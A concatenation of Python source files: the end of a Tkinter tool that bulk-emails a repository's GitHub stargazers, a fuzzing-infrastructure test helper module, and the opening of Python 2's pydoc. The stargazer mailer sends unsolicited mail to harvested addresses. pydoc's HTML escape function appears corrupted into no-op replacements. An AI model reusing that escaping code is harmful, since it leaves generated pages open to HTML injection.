log_message(f"Repository: {repo.name}")
for name, email in repo.gazers:
log_message(f"Sending to \'{name}\' ({email})")
email_text = settings.email_text.format(settings.gmail_user,
email,
repo.name,
name,
repo.name,
repo.url)
gmail.send_mail(email, email_text)
github.mark_as_sent(repo.url, email)
log_message("Saving sent emails...")
github.save_data()
log_message("Done sending emails!")
refresh_repos()
def send_emails():
change_button_states(False)
send_email_thread = threading.Thread(target=async_send_email)
send_email_thread.start()
github = GithubInterface()
master = tk.Tk()
master.title("GithubSurvey")
title_label = tk.Label(master, text="Github Repositories:")
refresh_button = tk.Button(master, text="Refresh", command=refresh_repos)
pw = tk.PanedWindow(master, orient=tk.VERTICAL)
# listbox + scrollbar
listbox_frame = tk.Frame(pw)
listbox_scrollbar = tk.Scrollbar(listbox_frame)
listbox = tk.Listbox(listbox_frame, yscrollcommand=listbox_scrollbar.set, selectmode=tk.EXTENDED)
listbox_scrollbar.config(command=listbox.yview)
listbox.pack(expand=tk.Y, side=tk.LEFT, fill=tk.BOTH)
listbox_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
pw.add(listbox_frame)
# debug message box
message_frame = tk.Frame(pw)
message_scrollbar = tk.Scrollbar(message_frame)
message = tk.Text(message_frame, height=8, wrap=None, state='disabled')
message_scrollbar.config(command=message.yview)
message.pack(expand=tk.Y, side=tk.LEFT, fill=tk.BOTH)
message_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
pw.add(message_frame)
send_button = tk.Button(master, text="Send!", command=send_emails)
# pack everything
title_label.pack()
refresh_button.pack()
pw.pack(side=tk.TOP, expand=tk.Y, fill=tk.BOTH, pady=2, padx='2m')
send_button.pack()
title_label.after(0, refresh_repos)
master.mainloop()
|
test_utils.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic helper functions useful in tests."""
from builtins import object
from builtins import str
from future import standard_library
standard_library.install_aliases()
import atexit
import datetime
import io
import os
import requests
import shutil
import six
import socket
import subprocess
import sys
import tempfile
import threading
import unittest
from config import local_config
from datastore import data_types
from datastore import ndb_init
from google_cloud_utils import pubsub
from system import environment
from system import process_handler
CURRENT_TIME = datetime.datetime.utcnow()
EMULATOR_TIMEOUT = 20
# Per-process emulator instances.
_emulators = {}
def create_generic_testcase(created_days_ago=28):
"""Create a simple test case."""
testcase = data_types.Testcase()
# Add more values here as needed. Intended to be the bare minimum for what we
# need to simulate a test case.
testcase.absolute_path = '/a/b/c/test.html'
testcase.crash_address = '0xdeadbeef'
testcase.crash_revision = 1
testcase.crash_state = 'crashy_function()'
testcase.crash_stacktrace = testcase.crash_state
testcase.crash_type = 'fake type'
testcase.comments = 'Fuzzer: test'
testcase.fuzzed_keys = 'abcd'
testcase.minimized_keys = 'efgh'
testcase.fuzzer_name = 'fuzzer1'
testcase.open = True
testcase.one_time_crasher_flag = False
testcase.job_type = 'test_content_shell_drt'
testcase.status = 'Processed'
testcase.timestamp = CURRENT_TIME - datetime.timedelta(days=created_days_ago)
testcase.project_name = 'project'
testcase.platform = 'linux'
testcase.put()
return testcase
def entities_equal(entity_1, entity_2, check_key=True):
"""Return a bool on whether two input entities are the same."""
if check_key:
return entity_1.key == entity_2.key
return entity_1.to_dict() == entity_2.to_dict()
def entity_exists(entity):
"""Return a bool on where the entity exists in datastore."""
return entity.get_by_id(entity.key.id())
def adhoc(func):
"""Mark the testcase as an adhoc. Adhoc tests are NOT expected to run before
merging and are NOT counted toward test coverage; they are used to test
tricky situations.
Another way to think about it is that, if there was no adhoc test, we
would write a Python script (which is not checked in) to test what we want
anyway... so, it's better to check in the script.
For example, downloading a chrome revision (10GB) and
unpacking it. It can be enabled using the env ADHOC=1."""
return unittest.skipIf(not environment.get_value('ADHOC', False),
'Adhoc tests are not enabled.')(
func)
def integration(func):
"""Mark the testcase as integration because it depends on network resources
and/or is slow. The integration tests should, at least, be run before
merging and are counted toward test coverage. It can be enabled using the
env INTEGRATION=1."""
return unittest.skipIf(not environment.get_value('INTEGRATION', False),
'Integration tests are not enabled.')(
func)
def slow(func):
"""Slow tests which are skipped during presubmit."""
return unittest.skipIf(not environment.get_value('SLOW_TESTS', True),
'Skipping slow tests.')(
func)
def reproduce_tool(func):
"""Tests for the test case reproduction script."""
return unittest.skipIf(
not environment.get_value('REPRODUCE_TOOL_TESTS', False),
'Skipping reproduce tool tests.')(
func)
# TODO(mbarbella): Remove this and all users after fully migrating to Python 3.
def python2_only(func):
"""Tests which can only run on Python 2."""
return unittest.skipIf(sys.version_info.major != 2,
'Skipping Python 2-only test.')(
func)
def python3_only(func):
"""Tests which can only run on Python 3."""
return unittest.skipIf(sys.version_info.major != 3,
'Skipping Python 3-only test.')(
func)
def android_device_required(func):
"""Skip Android-specific tests if we cannot run them."""
reason = None
if not environment.get_value('ANDROID_SERIAL'):
reason = 'Android device tests require that ANDROID_SERIAL is set.'
elif not environment.get_value('INTEGRATION'):
reason = 'Integration tests are not enabled.'
elif environment.platform() != 'LINUX':
reason = 'Android device tests can only run on a Linux host.'
return unittest.skipIf(reason is not None, reason)(func)
class EmulatorInstance(object):
"""Emulator instance."""
def __init__(self, proc, port, read_thread, data_dir):
self._proc = proc
self._port = port
self._read_thread = read_thread
self._data_dir = data_dir
def cleanup(self):
"""Stop and clean up the emulator."""
process_handler.terminate_root_and_child_processes(self._proc.pid)
self._read_thread.join()
if self._data_dir:
shutil.rmtree(self._data_dir, ignore_errors=True)
def reset(self):
"""Reset emulator state."""
req = requests.post('http://localhost:{}/reset'.format(self._port))
req.raise_for_status()
def _find_free_port():
"""Find a free port."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
sock.close()
return port
def wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=EMULATOR_TIMEOUT,
output_lines=None):
"""Wait for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if output_lines is not None:
output_lines.append(line)
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
def start_cloud_emulator(emulator,
args=None,
data_dir=None,
store_on_disk=False):
"""Start a cloud emulator."""
ready_indicators = {
'datastore': b'is now running',
'pubsub': b'Server started',
}
store_on_disk_flag = ('--store-on-disk'
if store_on_disk else '--no-store-on-disk')
default_flags = {
'datastore': [store_on_disk_flag, '--consistency=1'],
'pubsub': [],
}
if emulator not in ready_indicators:
raise RuntimeError('Unsupported emulator')
if data_dir:
cleanup_dir = None
else:
temp_dir = tempfile.mkdtemp()
data_dir = temp_dir
cleanup_dir = temp_dir
port = _find_free_port()
command = [
'gcloud', 'beta', 'emulators', emulator, 'start',
'--data-dir=' + data_dir, '--host-port=localhost:' + str(port),
'--project=' + local_config.GAEConfig().get('application_id')
]
if args:
command.extend(args)
command.extend(default_flags[emulator])
# Start emulator.
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
thread = wait_for_emulator_ready(proc, emulator, ready_indicators[emulator])
# Set env vars.
env_vars = subprocess.check_output([
'gcloud', 'beta', 'emulators', emulator, 'env-init',
'--data-dir=' + data_dir
])
for line in env_vars.splitlines():
key, value = line.split()[1].split(b'=')
os.environ[key.strip().decode('utf-8')] = value.strip().decode('utf-8')
return EmulatorInstance(proc, port, thread, cleanup_dir)
def create_pubsub_topic(client, project, name):
"""Create topic if it doesn't exist."""
full_name = pubsub.topic_name(project, name)
if client.get_topic(full_name):
return
client.create_topic(full_name)
def create_pubsub_subscription(client, project, topic, name):
"""Create subscription if it doesn't exist."""
topic_name = pubsub.topic_name(project, topic)
full_name = pubsub.subscription_name(project, name)
if client.get_subscription(full_name):
return
client.create_subscription(full_name, topic_name)
def setup_pubsub(project):
"""Set up pubsub topics and subscriptions."""
config = local_config.Config('pubsub.queues')
client = pubsub.PubSubClient()
queues = config.get('resources')
for queue in queues:
create_pubsub_topic(client, project, queue['name'])
create_pubsub_subscription(client, project, queue['name'], queue['name'])
def with_cloud_emulators(*emulator_names):
"""Decorator for starting cloud emulators from a unittest.TestCase."""
def decorator(cls):
"""Decorator."""
class Wrapped(cls):
"""Wrapped class."""
@classmethod
def setUpClass(cls):
"""Class setup."""
for emulator_name in emulator_names:
if emulator_name not in _emulators:
_emulators[emulator_name] = start_cloud_emulator(emulator_name)
atexit.register(_emulators[emulator_name].cleanup)
if emulator_name == 'datastore':
cls._context_generator = ndb_init.context()
cls._context_generator.__enter__()
super(Wrapped, cls).setUpClass()
@classmethod
def tearDownClass(cls):
"""Class teardown."""
for emulator_name in emulator_names:
if emulator_name == 'datastore':
cls._context_generator.__exit__(None, None, None)
super(Wrapped, cls).tearDownClass()
def setUp(self):
for emulator in six.itervalues(_emulators):
emulator.reset()
super(Wrapped, self).setUp()
Wrapped.__module__ = cls.__module__
Wrapped.__name__ = cls.__name__
return Wrapped
return decorator
def set_up_pyfakefs(test_self):
"""Helper to set up Pyfakefs."""
real_cwd = os.path.realpath(os.getcwd())
config_dir = os.path.realpath(environment.get_config_directory())
test_self.setUpPyfakefs()
test_self.fs.add_real_directory(config_dir, lazy_read=False)
os.chdir(real_cwd)
def supported_platforms(*platforms):
"""Decorator for enabling tests only on certain platforms."""
def decorator(func): # pylint: disable=unused-argument
"""Decorator."""
return unittest.skipIf(environment.platform() not in platforms,
'Unsupported platform.')(
func)
return decorator
MockStdout = io.StringIO # pylint: disable=invalid-name
|
pydoc.py | #!/usr/bin/env python
# -*- coding: Latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://www.python.org/doc/current/lib/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 54826 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
if _re_stripid.search(repr(Exception)):
return _re_stripid.sub(r'\1', text)
return text
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
if name in ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__'): return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup((name, kind, cls, value)):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, (exc, value, tb)):
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and \
split(lower(str(value)))[:2] == ['no', 'module']:
# The module was not found.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://www.python.org/doc/current/lib")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages'))))):
htmlfile = "module-%s.html" % object.__name__
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), htmlfile)
else:
docloc = os.path.join(docloc, htmlfile)
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!doctype html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, (name, path, ispackage, shadowed)):
"""Make a link for a module or package to display in an index."""
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/peps/pep-%04d.html' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda (key, value), s=self: s.modulelink(value))
result = result + self.bigsection(
'Modules', '#fffff', '#aa55cc', contents)
if classes:
classlist = map(lambda (key, value): value, classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
